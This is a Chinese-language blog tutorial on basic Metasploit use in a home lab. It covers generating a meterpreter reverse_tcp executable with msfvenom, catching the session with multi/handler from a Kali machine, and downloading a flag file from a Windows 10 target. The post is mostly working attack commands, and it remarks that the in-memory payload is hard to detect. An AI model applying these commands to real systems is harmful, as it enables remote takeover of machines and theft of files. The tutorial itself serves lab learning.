Metasploit的简单应用
Metasploit的简单应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
工具
靶机: 关闭了windows安全中心的win10,ip: 192.168.118.132
攻击机:kali ip:192.168.118.128
开搞
生成被控端
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118.128 LPORT=5000 -f exe > /root/payload.exe
#LHOST=kali的ip
#LPORT=端口


将生成的payload.exe丢进靶机里面

回到kali
运行msfconsole

执行以下命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

执行 show options查看配置

发现LHOST和LPORT还没设置
执行
set lhost 192.168.118.128
set lport 5000

LHOST和LPORT已经重新设置
然后执行
exploit
等待对方上线

双击靶机的payload.exe就可以看到kali中出现了一个session,也就是会话,这表示从现在起,我们可以通过被控制端程序来控制目标计算机了。同时,我们可以看到上图中出现meterpreter,这就是一个被控程序,meterpreter是运行在内存中的,通过注入dll文件实现,在目标计算机的硬盘上不会留下文件痕迹,所以在被入侵时很难找到。输入ls就可以查看payload.exe文件所在的当前目录有哪些文件

我在靶机桌面上放了个flag.txt

回到kali执行ls查看文件

把它下载下来
download flag.txt

得到flag

搞定收工
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Tree's Blog!




